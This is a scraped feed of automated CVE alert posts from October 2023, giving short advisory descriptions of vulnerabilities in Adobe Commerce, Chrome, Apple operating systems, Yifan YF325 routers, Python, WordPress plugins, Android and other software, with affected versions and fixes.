🚨 CVE-2023-38250Adobe Commerce versions 2.4.7-beta1 (and earlier), 2.4.6-p2 (and earlier), 2.4.5-p4 (and earlier) and 2.4.4-p5 (and earlier) are affected by an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability that could lead in arbitrary code execution by an admin-privilege authenticated attacker. Exploitation of this issue does not require user interaction and attack complexity is high as it requires knowledge of tooling beyond just using the UI.🎖@cveNotify |
|
| 2023-10-13 10:52:01 |
🚨 CVE-2023-38251Adobe Commerce versions 2.4.7-beta1 (and earlier), 2.4.6-p2 (and earlier), 2.4.5-p4 (and earlier) and 2.4.4-p5 (and earlier) are affected by a Uncontrolled Resource Consumption vulnerability that could lead in minor application denial-of-service. Exploitation of this issue does not require user interaction.🎖@cveNotify |
|
| 2023-10-13 10:52:00 |
🚨 CVE-2023-5554Lack of TLS certificate verification in log transmission of a financial module within LINE Client for iOS prior to 13.16.0.🎖@cveNotify |
|
| 2023-10-13 06:23:09 |
🚨 CVE-2023-39365Cacti is an open source operational monitoring and fault management framework. Issues with Cacti Regular Expression validation combined with the external links feature can lead to limited SQL Injections and subsequent data leakage. This issue has been addressed in version 1.2.25. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-10-13 06:23:08 |
🚨 CVE-2023-43641libcue provides an API for parsing and extracting data from CUE sheets. Versions 2.2.1 and prior are vulnerable to out-of-bounds array access. A user of the GNOME desktop environment can be exploited by downloading a cue sheet from a malicious webpage. Because the file is saved to `~/Downloads`, it is then automatically scanned by tracker-miners. And because it has a .cue filename extension, tracker-miners use libcue to parse the file. The file exploits the vulnerability in libcue to gain code execution. This issue is patched in version 2.3.0.🎖@cveNotify |
|
| 2023-10-13 06:23:06 |
🚨 CVE-2023-43804urllib3 is a user-friendly HTTP client library for Python. urllib3 doesn't treat the `Cookie` HTTP header special or provide any helpers for managing cookies over HTTP, that is the responsibility of the user. However, it is possible for a user to specify a `Cookie` header and unknowingly leak information via HTTP redirects to a different origin if that user doesn't disable redirects explicitly. This issue has been patched in urllib3 version 1.26.17 or 2.0.5.🎖@cveNotify |
|
| 2023-10-13 06:23:04 |
🚨 CVE-2023-5344Heap-based Buffer Overflow in GitHub repository vim/vim prior to 9.0.1969.🎖@cveNotify |
|
| 2023-10-13 06:23:03 |
🚨 CVE-2022-48064GNU Binutils before 2.40 was discovered to contain an excessive memory consumption vulnerability via the function bfd_dwarf2_find_nearest_line_with_alt at dwarf2.c. The attacker could supply a crafted ELF file and cause a DNS attack.🎖@cveNotify |
|
| 2023-10-13 06:23:01 |
🚨 CVE-2023-42752An integer overflow flaw was found in the Linux kernel. This issue leads to the kernel allocating `skb_shared_info` in the userspace, which is exploitable in systems without SMAP protection since `skb_shared_info` contains references to function pointers.🎖@cveNotify |
|
| 2023-10-13 06:23:00 |
🚨 CVE-2023-4562Improper Authentication vulnerability in Mitsubishi Electric Corporation MELSEC-F Series main modules allows a remote unauthenticated attacker to obtain sequence programs from the product or write malicious sequence programs or improper data in the product without authentication by sending illegitimate messages.🎖@cveNotify |
|
| 2023-10-13 06:22:58 |
🚨 CVE-2023-5557A flaw was found in the tracker-miners package. A weakness in the sandbox allows a maliciously-crafted file to execute code outside the sandbox if the tracker-extract process has first been compromised by a separate vulnerability.🎖@cveNotify |
|
| 2023-10-13 06:22:56 |
🚨 CVE-2023-5218Use after free in Site Isolation in Google Chrome prior to 118.0.5993.70 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical)🎖@cveNotify |
|
| 2023-10-13 06:22:55 |
🚨 CVE-2023-5473Use after free in Cast in Google Chrome prior to 118.0.5993.70 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-10-13 06:22:54 |
🚨 CVE-2023-5474Heap buffer overflow in PDF in Google Chrome prior to 118.0.5993.70 allowed a remote attacker who convinced a user to engage in specific user interactions to potentially exploit heap corruption via a crafted PDF file. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-10-13 06:22:53 |
🚨 CVE-2023-5475Inappropriate implementation in DevTools in Google Chrome prior to 118.0.5993.70 allowed an attacker who convinced a user to install a malicious extension to bypass discretionary access control via a crafted Chrome Extension. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-10-13 00:22:20 |
🚨 CVE-2023-34426A stack-based buffer overflow vulnerability exists in the httpd manage_request functionality of Yifan YF325 v1.0_20221108. A specially crafted network request can lead to stack-based buffer overflow. An attacker can send a network request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-10-13 00:22:19 |
🚨 CVE-2023-35055A buffer overflow vulnerability exists in the httpd next_page functionality of Yifan YF325 v1.0_20221108. A specially crafted network request can lead to command execution. An attacker can send a network request to trigger this vulnerability.This buffer overflow is in the next_page parameter in the gozila_cgi function.🎖@cveNotify |
|
| 2023-10-13 00:22:18 |
🚨 CVE-2023-35056A buffer overflow vulnerability exists in the httpd next_page functionality of Yifan YF325 v1.0_20221108. A specially crafted network request can lead to command execution. An attacker can send a network request to trigger this vulnerability.This buffer overflow is in the next_page parameter in the cgi_handler function.🎖@cveNotify |
|
| 2023-10-13 00:22:17 |
🚨 CVE-2023-35965Two heap-based buffer overflow vulnerabilities exist in the httpd manage_post functionality of Yifan YF325 v1.0_20221108. A specially crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger these vulnerabilities.This integer overflow result is used as argument for the malloc function.🎖@cveNotify |
|
| 2023-10-13 00:22:16 |
🚨 CVE-2023-35966Two heap-based buffer overflow vulnerabilities exist in the httpd manage_post functionality of Yifan YF325 v1.0_20221108. A specially crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger these vulnerabilities.This integer overflow result is used as argument for the realloc function.🎖@cveNotify |
|
| 2023-10-13 00:22:15 |
🚨 CVE-2023-35967Two heap-based buffer overflow vulnerabilities exist in the gwcfg_cgi_set_manage_post_data functionality of Yifan YF325 v1.0_20221108. A specially crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger these vulnerabilities.This integer overflow result is used as argument for the malloc function.🎖@cveNotify |
|
| 2023-10-13 00:22:14 |
🚨 CVE-2023-32645A leftover debug code vulnerability exists in the httpd debug credentials functionality of Yifan YF325 v1.0_20221108. A specially crafted network request can lead to authentication bypass. An attacker can send a network request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-10-13 00:22:13 |
🚨 CVE-2023-34346A stack-based buffer overflow vulnerability exists in the httpd gwcfg.cgi get functionality of Yifan YF325 v1.0_20221108. A specially crafted network packet can lead to command execution. An attacker can send a network request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-10-13 00:22:12 |
🚨 CVE-2023-35968Two heap-based buffer overflow vulnerabilities exist in the gwcfg_cgi_set_manage_post_data functionality of Yifan YF325 v1.0_20221108. A specially crafted network request can lead to a heap buffer overflow. An attacker can send a network request to trigger these vulnerabilities.This integer overflow result is used as argument for the realloc function.🎖@cveNotify |
|
| 2023-10-13 00:22:10 |
🚨 CVE-2023-31272A stack-based buffer overflow vulnerability exists in the httpd do_wds functionality of Yifan YF325 v1.0_20221108. A specially crafted network request can lead to stack-based buffer overflow. An attacker can send a network request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-10-13 00:22:09 |
🚨 CVE-2023-32632A command execution vulnerability exists in the validate.so diag_ping_start functionality of Yifan YF325 v1.0_20221108. A specially crafted network request can lead to command execution. An attacker can send a network request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-10-13 00:22:08 |
🚨 CVE-2023-24479An authentication bypass vulnerability exists in the httpd nvram.cgi functionality of Yifan YF325 v1.0_20221108. A specially crafted network request can lead to arbitrary command execution. An attacker can send a network request to trigger this vulnerability.🎖@cveNotify |
|
| 2023-10-13 00:22:07 |
🚨 CVE-2023-36698Windows Kernel Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-10-13 00:22:06 |
🚨 CVE-2023-36701Microsoft Resilient File System (ReFS) Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-10-13 00:22:05 |
🚨 CVE-2023-36702Microsoft DirectMusic Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-10-13 00:22:04 |
🚨 CVE-2023-36706Windows Deployment Services Information Disclosure Vulnerability🎖@cveNotify |
|
| 2023-10-13 00:22:03 |
🚨 CVE-2023-36776Win32k Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-10-13 00:22:01 |
🚨 CVE-2023-36780Skype for Business Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-10-13 00:22:00 |
🚨 CVE-2023-36703DHCP Server Service Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-10-13 00:21:59 |
🚨 CVE-2023-36704Windows Setup Files Cleanup Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2023-10-12 11:22:22 |
🚨 CVE-2006-10001A vulnerability, which was classified as problematic, was found in Subscribe to Comments Plugin up to 2.0.7 on WordPress. This affects an unknown part of the file subscribe-to-comments.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 2.0.8 is able to address this issue. The identifier of the patch is 9683bdf462fcac2f32b33be98f0b96497fbd1bb6. It is recommended to upgrade the affected component. The identifier VDB-222321 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-12 11:22:21 |
🚨 CVE-2008-10002A vulnerability has been found in cfire24 ajaxlife up to 0.3.2 and classified as problematic. This vulnerability affects unknown code. The manipulation leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 0.3.3 is able to address this issue. The patch is identified as 9fb53b67312fe3f4336e01c1e3e1bedb4be0c1c8. It is recommended to upgrade the affected component. VDB-222286 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-12 11:22:19 |
🚨 CVE-2012-10008A vulnerability, which was classified as critical, has been found in uakfdotb oneapp. This issue affects some unknown processing. The manipulation leads to sql injection. The attack may be initiated remotely. This product does not use versioning. This is why information about affected and unaffected releases are unavailable. The patch is named 5413ac804f1b09f9decc46a6c37b08352c49669c. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-221483.🎖@cveNotify |
|
| 2023-10-12 11:22:18 |
🚨 CVE-2012-10007A vulnerability was found in madgicweb BuddyStream Plugin up to 3.2.7 on WordPress. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file ShareBox.php. The manipulation of the argument content/link/shares leads to cross site scripting. The attack can be launched remotely. Upgrading to version 3.2.8 is able to address this issue. The patch is named 7d5b9a89a27711aad76fd55ab4cc4185b545a1d0. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-221479.🎖@cveNotify |
|
| 2023-10-12 11:22:17 |
🚨 CVE-2011-10003A vulnerability was found in XpressEngine up to 1.4.4. It has been rated as critical. This issue affects some unknown processing of the component Update Query Handler. The manipulation leads to sql injection. Upgrading to version 1.4.5 is able to address this issue. The patch is named c6e94449f21256d6362450b29c7847305e756ad5. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-220247.🎖@cveNotify |
|
| 2023-10-12 11:22:15 |
🚨 CVE-2011-10002A vulnerability classified as critical has been found in weblabyrinth 0.3.1. This affects the function Labyrinth of the file labyrinth.inc.php. The manipulation leads to sql injection. Upgrading to version 0.3.2 is able to address this issue. The identifier of the patch is 60793fd8c8c4759596d3510641e96ea40e7f60e9. It is recommended to upgrade the affected component. The identifier VDB-220221 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-12 11:22:14 |
🚨 CVE-2009-10003A vulnerability was found in capnsquarepants wordcraft up to 0.6. It has been classified as problematic. Affected is an unknown function of the file tag.php. The manipulation of the argument tag leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 0.7 is able to address this issue. The patch is identified as be23028633e8105de92f387036871c03f34d3124. It is recommended to upgrade the affected component. VDB-219714 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-12 11:22:13 |
🚨 CVE-2013-10014A vulnerability classified as critical has been found in oktora24 2moons. Affected is an unknown function. The manipulation leads to sql injection. The patch is identified as 1b09cf7672eb85b5b0c8a4de321f7a4ad87b09a7. It is recommended to apply a patch to fix this issue. VDB-218898 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-12 11:22:12 |
🚨 CVE-2010-10009A vulnerability was found in frioux ptome. It has been rated as critical. This issue affects some unknown processing. The manipulation leads to sql injection. The patch is named 26829bba67858ca0bd4ce49ad50e7ce653914276. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218519.🎖@cveNotify |
|
| 2023-10-12 11:22:11 |
🚨 CVE-2011-10001A vulnerability was found in iamdroppy phoenixcf. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file content/2-Community/articles.cfm. The manipulation leads to sql injection. The patch is named d156faf8bc36cd49c3b10d3697ef14167ad451d8. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218491.🎖@cveNotify |
|
| 2023-10-12 11:22:10 |
🚨 CVE-2012-10006A vulnerability classified as critical has been found in ale7714 sigeprosi. This affects an unknown part. The manipulation leads to sql injection. The identifier of the patch is 5291886f6c992316407c376145d331169c55f25b. It is recommended to apply a patch to fix this issue. The identifier VDB-218493 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-12 11:22:08 |
🚨 CVE-2010-10007** UNSUPPPORTED WHEN ASSIGNED ** ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in lierdakil click-reminder. It has been rated as critical. This issue affects the function db_query of the file src/backend/include/BaseAction.php. The manipulation leads to sql injection. The identifier of the patch is 41213b660e8eb01b22c8074f06208f59a73ca8dc. It is recommended to apply a patch to fix this issue. The identifier VDB-218465 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-10-12 11:22:07 |
🚨 CVE-2010-10006A vulnerability, which was classified as problematic, was found in michaelliao jopenid. Affected is the function getAuthentication of the file JOpenId/src/org/expressme/openid/OpenIdManager.java. The manipulation leads to observable timing discrepancy. The complexity of an attack is rather high. The exploitability is told to be difficult. Upgrading to version 1.08 is able to address this issue. The name of the patch is c9baaa976b684637f0d5a50268e91846a7a719ab. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-218460.🎖@cveNotify |
|
| 2023-10-12 11:22:06 |
🚨 CVE-2010-10008** UNSUPPPORTED WHEN ASSIGNED ** ** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in simplesamlphp simplesamlphp-module-openidprovider up to 0.8.x. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file templates/trust.tpl.php. The manipulation of the argument StateID leads to cross site scripting. The attack can be launched remotely. Upgrading to version 0.9.0 is able to address this issue. The identifier of the patch is 8365d48c863cf06ccf1465cc0a161cefae29d69d. It is recommended to upgrade the affected component. The identifier VDB-218473 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-10-12 11:22:05 |
🚨 CVE-2009-10002A vulnerability, which was classified as problematic, has been found in dpup fittr-flickr. This issue affects some unknown processing of the file fittr-flickr/features/easy-exif.js of the component EXIF Preview Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The identifier of the patch is 08875dd8a2e5d0d16568bb0d67cb4328062fccde. It is recommended to apply a patch to fix this issue. The identifier VDB-218297 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-12 11:22:01 |
🚨 CVE-2012-10005A vulnerability has been found in manikandan170890 php-form-builder-class and classified as problematic. Affected by this vulnerability is an unknown functionality of the file PFBC/Element/Textarea.php of the component Textarea Handler. The manipulation of the argument value leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The patch is named 74897993818d826595fd5857038e6703456a594a. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218155.🎖@cveNotify |
|
| 2023-10-12 11:22:00 |
🚨 CVE-2013-10010A vulnerability classified as problematic has been found in zerochplus. This affects the function PrintResList of the file test/mordor/thread.res.pl. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The patch is named 9ddf9ecca8565341d8d26a3b2f64540bde4fa273. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-218007.🎖@cveNotify |
|
| 2023-10-12 11:21:59 |
🚨 CVE-2012-10004A vulnerability was found in backdrop-contrib Basic Cart on Drupal. It has been classified as problematic. Affected is the function basic_cart_checkout_form_submit of the file basic_cart.cart.inc. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 1.x-1.1.1 is able to address this issue. The patch is identified as a10424ccd4b3b4b433cf33b73c1ad608b11890b4. It is recommended to upgrade the affected component. VDB-217950 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-12 11:21:58 |
🚨 CVE-2010-10004A vulnerability was found in Information Cards Module on simpleSAMLphp and classified as problematic. This issue affects some unknown processing. The manipulation leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 1.0 is able to address this issue. The identifier of the patch is f6bfea49ae16dc6e179df8306d39c3694f1ef186. It is recommended to upgrade the affected component. The identifier VDB-217661 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-12 11:21:57 |
🚨 CVE-2013-10009A vulnerability was found in DrAzraelTod pyChao and classified as critical. Affected by this issue is the function klauen/lesen of the file mod_fun/__init__.py. The manipulation leads to sql injection. The patch is identified as 9d8adbc07c384ba51c2583ce0819c9abb77dc648. It is recommended to apply a patch to fix this issue. VDB-217634 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-10-12 05:23:00 |
🚨 CVE-2023-44464pretix before 2023.7.2 allows Pillow to parse EPS files.🎖@cveNotify |
|
| 2023-10-12 05:22:58 |
🚨 CVE-2023-5186Use after free in Passwords in Google Chrome prior to 117.0.5938.132 allowed a remote attacker who convinced a user to engage in specific UI interaction to potentially exploit heap corruption via crafted UI interaction. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-10-12 05:22:57 |
🚨 CVE-2023-5187Use after free in Extensions in Google Chrome prior to 117.0.5938.132 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-10-12 05:22:56 |
🚨 CVE-2023-41991A certificate validation issue was addressed. This issue is fixed in macOS Ventura 13.6, iOS 16.7 and iPadOS 16.7. A malicious app may be able to bypass signature validation. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.🎖@cveNotify |
|
| 2023-10-12 05:22:54 |
🚨 CVE-2023-41992The issue was addressed with improved checks. This issue is fixed in macOS Monterey 12.7, macOS Ventura 13.6, iOS 16.7 and iPadOS 16.7. A local attacker may be able to elevate their privileges. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.🎖@cveNotify |
|
| 2023-10-12 05:22:53 |
🚨 CVE-2023-41993The issue was addressed with improved checks. This issue is fixed in Safari 17, iOS 16.7 and iPadOS 16.7, macOS Sonoma 14. Processing web content may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited against versions of iOS before iOS 16.7.🎖@cveNotify |
|
| 2023-10-12 05:22:51 |
🚨 CVE-2023-41073An authorization issue was addressed with improved state management. This issue is fixed in macOS Ventura 13.6, tvOS 17, iOS 16.7 and iPadOS 16.7, macOS Monterey 12.7, watchOS 10, iOS 17 and iPadOS 17, macOS Sonoma 14. An app may be able to access protected user data.🎖@cveNotify |
|
| 2023-10-12 05:22:50 |
🚨 CVE-2023-41071A use-after-free issue was addressed with improved memory management. This issue is fixed in tvOS 17, iOS 17 and iPadOS 17, watchOS 10, macOS Ventura 13.6. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-10-12 05:22:48 |
🚨 CVE-2023-41074The issue was addressed with improved checks. This issue is fixed in tvOS 17, Safari 17, watchOS 10, iOS 17 and iPadOS 17, macOS Sonoma 14. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-10-12 05:22:47 |
🚨 CVE-2023-41068An access issue was addressed with improved access restrictions. This issue is fixed in tvOS 17, iOS 17 and iPadOS 17, watchOS 10, iOS 16.7 and iPadOS 16.7. A user may be able to elevate privileges.🎖@cveNotify |
|
| 2023-10-12 05:22:46 |
🚨 CVE-2023-41070A logic issue was addressed with improved checks. This issue is fixed in macOS Ventura 13.6, iOS 16.7 and iPadOS 16.7, watchOS 10, iOS 17 and iPadOS 17, macOS Sonoma 14. An app may be able to access sensitive data logged when a user shares a link.🎖@cveNotify |
|
| 2023-10-12 05:22:44 |
🚨 CVE-2023-41067A logic issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14. An app may bypass Gatekeeper checks.🎖@cveNotify |
|
| 2023-10-12 05:22:43 |
🚨 CVE-2023-41066An authentication issue was addressed with improved state management. This issue is fixed in macOS Sonoma 14. An app may be able to unexpectedly leak a user's credentials from secure text fields.🎖@cveNotify |
|
| 2023-10-12 05:22:42 |
🚨 CVE-2023-41065A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in tvOS 17, iOS 17 and iPadOS 17, watchOS 10, macOS Sonoma 14. An app may be able to read sensitive location information.🎖@cveNotify |
|
| 2023-10-12 05:22:41 |
🚨 CVE-2023-41063The issue was addressed with improved memory handling. This issue is fixed in macOS Ventura 13.6, tvOS 17, iOS 16.7 and iPadOS 16.7, iOS 17 and iPadOS 17, macOS Sonoma 14. An app may be able to execute arbitrary code with kernel privileges.🎖@cveNotify |
|
| 2023-10-12 05:22:40 |
🚨 CVE-2023-40541This issue was addressed by adding an additional prompt for user consent. This issue is fixed in macOS Sonoma 14. A shortcut may output sensitive user data without consent.🎖@cveNotify |
|
| 2023-10-12 05:22:38 |
🚨 CVE-2023-40454A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Ventura 13.6, tvOS 17, iOS 16.7 and iPadOS 16.7, macOS Monterey 12.7, watchOS 10, iOS 17 and iPadOS 17, macOS Sonoma 14. An app may be able to delete files for which it does not have permission.🎖@cveNotify |
|
| 2023-10-12 05:22:37 |
🚨 CVE-2023-40456The issue was addressed with improved checks. This issue is fixed in tvOS 17, iOS 17 and iPadOS 17, watchOS 10. An app may be able to access edited photos saved to a temporary directory.🎖@cveNotify |
|
| 2023-10-12 05:22:35 |
🚨 CVE-2023-40520The issue was addressed with improved checks. This issue is fixed in tvOS 17, iOS 17 and iPadOS 17, watchOS 10. An app may be able to access edited photos saved to a temporary directory.🎖@cveNotify |
|
| 2023-10-12 05:22:34 |
🚨 CVE-2023-40452The issue was addressed with improved bounds checks. This issue is fixed in macOS Ventura 13.6, tvOS 17, macOS Monterey 12.7, watchOS 10, iOS 17 and iPadOS 17, macOS Sonoma 14. An app may be able to overwrite arbitrary files.🎖@cveNotify |
|
| 2023-10-12 00:52:06 |
🚨 CVE-2022-48564read_ints in plistlib.py in Python through 3.9.1 is vulnerable to a potential DoS attack via CPU and RAM exhaustion when processing malformed Apple Property List files in binary format.🎖@cveNotify |
|
| 2023-10-12 00:52:05 |
🚨 CVE-2022-48560A use-after-free exists in Python through 3.9 via heappushpop in heapq.🎖@cveNotify |
|
| 2023-10-12 00:52:04 |
🚨 CVE-2022-48565An XML External Entity (XXE) issue was discovered in Python through 3.9.1. The plistlib module no longer accepts entity declarations in XML plist files to avoid XML vulnerabilities.🎖@cveNotify |
|
| 2023-10-12 00:52:02 |
🚨 CVE-2023-39325A malicious HTTP/2 client which rapidly creates requests and immediately resets them can cause excessive server resource consumption. While the total number of requests is bounded by the http2.Server.MaxConcurrentStreams setting, resetting an in-progress request allows the attacker to create a new request while the existing one is still executing. With the fix applied, HTTP/2 servers now bound the number of simultaneously executing handler goroutines to the stream concurrency limit (MaxConcurrentStreams). New requests arriving when at the limit (which can only happen after the client has reset an existing, in-flight request) will be queued until a handler exits. If the request queue grows too large, the server will terminate the connection. This issue is also fixed in golang.org/x/net/http2 for users manually configuring HTTP/2. The default stream concurrency limit is 250 streams (requests) per HTTP/2 connection. This value may be adjusted using the golang.org/x/net/http2 package; see the Server.MaxConcurrentStreams setting and the ConfigureServer function.🎖@cveNotify |
|
| 2023-10-12 00:52:01 |
🚨 CVE-2023-44189An Origin Validation vulnerability in MAC address validation of Juniper Networks Junos OS Evolved on PTX10003 Series allows a network-adjacent attacker to bypass MAC address checking, allowing MAC addresses not intended to reach the adjacent LAN to be forwarded to the downstream network. Due to this issue, the router will start forwarding traffic if a valid route is present in forwarding-table, causing a loop and congestion in the downstream layer-2 domain connected to the device.This issue affects Juniper Networks Junos OS Evolved on PTX10003 Series: * All versions prior to 21.4R3-S4-EVO; * 22.1 versions prior to 22.1R3-S3-EVO; * 22.2 version 22.2R1-EVO and later versions; * 22.3 versions prior to 22.3R2-S2-EVO, 22.3R3-S1-EVO; * 22.4 versions prior to 22.4R2-S1-EVO, 22.4R3-EVO; * 23.2 versions prior to 23.2R2-EVO.🎖@cveNotify |
|
| 2023-10-12 00:52:00 |
🚨 CVE-2023-44190An Origin Validation vulnerability in MAC address validation of Juniper Networks Junos OS Evolved on PTX10001, PTX10004, PTX10008, and PTX10016 devices allows a network-adjacent attacker to bypass MAC address checking, allowing MAC addresses not intended to reach the adjacent LAN to be forwarded to the downstream network. Due to this issue, the router will start forwarding traffic if a valid route is present in forwarding-table, causing a loop and congestion in the downstream layer-2 domain connected to the device.This issue affects Juniper Networks Junos OS Evolved on PTX10001, PTX10004, PTX10008, and PTX10016: * All versions prior to 21.4R3-S5-EVO; * 22.1 versions prior to 22.1R3-S4-EVO; * 22.2 versions 22.2R1-EVO and later; * 22.3 versions prior to 22.3R2-S2-EVO, 22.3R3-S1-EVO; * 22.4 versions prior to 22.4R2-S1-EVO, 22.4R3-EVO; * 23.2 versions prior to 23.2R1-S1-EVO, 23.2R2-EVO.🎖@cveNotify |
|
| 2023-10-12 00:51:59 |
🚨 CVE-2023-44487The HTTP/2 protocol allows a denial of service (server resource consumption) because request cancellation can reset many streams quickly, as exploited in the wild in August through October 2023.🎖@cveNotify |
|
| 2023-10-11 22:52:20 |
🚨 CVE-2023-35649In several functions of Exynos modem files, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-10-11 22:52:19 |
🚨 CVE-2023-35652In ProtocolEmergencyCallListIndAdapter::Init of protocolcalladapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with baseband firmware compromise required. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-10-11 22:52:18 |
🚨 CVE-2023-35653In TBD of TBD, there is a possible way to access location information due to a permissions bypass. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-10-11 22:52:17 |
🚨 CVE-2023-35654In ctrl_roi of stmvl53l1_module.c, there is a possible out of bounds read due to an incorrect bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-10-11 22:52:16 |
🚨 CVE-2023-35655In CanConvertPadV2Op of darwinn_mlir_converter_aidl.cc, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-10-11 22:52:15 |
🚨 CVE-2023-35660In lwis_transaction_client_cleanup of lwis_transaction.c, there is a possible way to corrupt memory due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-10-11 22:52:14 |
🚨 CVE-2023-35661In ProfSixDecomTcpSACKoption of RohcPacketCommon.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-10-11 22:52:13 |
🚨 CVE-2023-35662there is a possible out of bounds write due to buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-10-11 22:52:12 |
🚨 CVE-2023-40141In temp_residency_name_store of thermal_metrics.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-10-11 22:52:10 |
🚨 CVE-2023-40142In TBD of TBD, there is a possible way to bypass carrier restrictions due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-10-11 22:52:09 |
🚨 CVE-2023-41881vantage6 is privacy preserving federated learning infrastructure. When a collaboration is deleted, the linked resources (such as tasks from that collaboration) should be deleted. This is partly to manage data properly, but also to prevent a potential (but unlikely) side-effect that affects versions prior to 4.0.0, where if a collaboration with id=10 is deleted, and subsequently a new collaboration is created with id=10, the authenticated users in that collaboration could potentially see results of the deleted collaboration in some cases. Version 4.0.0 contains a patch for this issue. There are no known workarounds.🎖@cveNotify |
|
| 2023-10-11 22:52:08 |
🚨 CVE-2023-41882vantage6 is privacy preserving federated learning infrastructure. The endpoint /api/collaboration/{id}/task is used to collect all tasks from a certain collaboration. To get such tasks, a user should have permission to view the collaboration and to view the tasks in it. However, prior to version 4.0.0, it is only checked if the user has permission to view the collaboration. Version 4.0.0 contains a patch. There are no known workarounds.🎖@cveNotify |
|
| 2023-10-11 22:52:07 |
🚨 CVE-2023-43661Cachet, the open-source status page system. Prior to the 2.4 branch, a template functionality which allows users to create templates allows them to execute any code on the server during the bad filtration and old twig version. Commit 6fb043e109d2a262ce3974e863c54e9e5f5e0587 of the 2.4 branch contains a patch for this issue.🎖@cveNotify |
|
| 2023-10-11 22:52:06 |
🚨 CVE-2023-5535Use After Free in GitHub repository vim/vim prior to v9.0.2010.🎖@cveNotify |
|
| 2023-10-11 22:52:05 |
